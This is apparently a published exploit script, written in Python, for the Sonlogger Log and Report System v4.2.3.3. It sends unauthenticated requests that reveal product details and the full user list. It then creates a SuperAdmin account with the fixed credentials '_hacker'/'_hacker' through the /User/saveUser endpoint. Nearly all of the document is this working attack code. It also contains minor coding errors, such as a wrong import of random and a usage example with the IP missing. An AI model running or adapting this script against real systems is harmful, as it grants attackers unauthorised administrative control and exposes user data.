# Exploit Title: Sonlogger - SuperAdmin Account Creation / Information Disclosure # Date: 04-02-2021 # Exploit Author: Berkan Er # Vendor Homepage: https://www.sonlogger.com/ # Version: # Tested on: Windows 10 Enterprise x64 Version 1803 # A remote attacker can be create an user with SuperAdmin profile #!/usr/bin/python3 import argparse import string import sys from random import random import requests import json banner = ''' Sonlogger Log and Report System - v4.2.3.3 Remote SuperAdmin Account Creation Vulnerability / Information Disclosure Berkan Er @erberkan ''' commonHeaders = { 'Content-type': 'application/json', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest' } def get_random_string(): res = ''.join(random.choices(string.ascii_lowercase, k=8)) print(res) return str(res) def getProductInfo(host, port, flag): response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo', data={}, headers=commonHeaders) print("[*] Status code: ", response.status_code) print("[*] Product Version: ", response.json()['Version']) info_json = json.dumps(response.json(), indent=2) response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders) user_json = json.dumps(response_1.json(), indent=2) if flag: print("\n*** Product Infos=\n" + info_json) print("\n*** Users=\n" + user_json) if response.json()['Version'] == '': print("[+] It seems vulnerable !") return True else: print("[!] It doesn't vulnerable !") return False def createSuperAdmin(host, port): payload = '''{ '_profilename':'superadmin_profile', '_username':'_hacker', '_password':'_hacker', '_fullname':'', '_email':'' }''' response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders) print("[*] STAUTS CODE:", response.status_code) print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker") response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders) json_formatted_str = json.dumps(response_1.json(), indent=2) print("\n*** Users=\n" + json_formatted_str) def main(): print(banner) try: host = sys.argv[1] port = sys.argv[2] action = sys.argv[3] if action == 'TRUE': if getProductInfo(host, port, False): createSuperAdmin(host, port) else: getProductInfo(host, port, True) print("KTHNXBYE!") except: print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP " "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product " "Infos") print("\nExample: python3 sonlogger-superadmin_create.py 5000 TRUE\n") if __name__ == "__main__": main()